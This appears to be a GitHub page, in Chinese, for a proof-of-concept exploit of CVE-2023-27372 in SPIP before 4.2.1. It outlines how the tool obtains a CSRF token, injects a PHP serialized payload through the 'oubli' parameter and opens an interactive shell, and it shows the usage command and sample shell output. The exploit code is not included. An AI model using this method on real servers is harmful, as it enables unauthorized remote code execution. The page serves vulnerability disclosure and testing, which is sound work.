estebanzarate/CVE-2023-27372-SPIP-4.2.1-Unauthenticated-RCE-PoC
GitHub: estebanzarate/CVE-2023-27372-SPIP-4.2.1-Unauthenticated-RCE-PoC
针对 SPIP 4.2.1 之前版本未认证 RCE 漏洞的 PoC 工具,支持交互式命令执行。
Stars: 0 | Forks: 0
# CVE-2023-27372 — SPIP < 4.2.1 未认证 RCE (PoC)
## 工作原理
1. 从 `/spip.php?page=spip_pass` 获取 anti-CSRF token。
2. 发送 POST 请求,将 PHP 序列化 payload 注入到 `oubli` 参数中。
3. 从响应中反射的 `value` 属性提取命令输出。
4. 循环进行交互式命令执行,每次请求刷新 CSRF token。
## 环境要求
- Python 3
- 安装依赖:
```
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
```
## 用法
```
python3 exploit.py -u http://TARGET/spip
```
**示例:**
```
$ python3 exploit.py -u http://10.10.10.10/spip
[*] Fetching anti-CSRF token...
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
```
## 参考
- [CVE-2023-27372](https://nvd.nist.gov/vuln/detail/CVE-2023-27372)
- [原作者 nuts7 的 PoC](https://github.com/nuts7/CVE-2023-27372)
- [SPIP 发布说明](https://blog.spip.net/)
## 致谢
- **发现与原始漏洞利用:** [nuts7](https://github.com/nuts7)
- **代码清理与交互式 Shell:** [Esteban Zárate](https://github.com/estebanzarate)
标签:CISA项目, CSRF绕过, CVE-2023-27372, Maven, PHP安全, PoC, RCE, SPIP, Webshell, Web安全, 反序列化漏洞, 命令注入, 威胁模拟, 暴力破解, 未授权攻击, 漏洞验证, 编程工具, 蓝队分析, 远程代码执行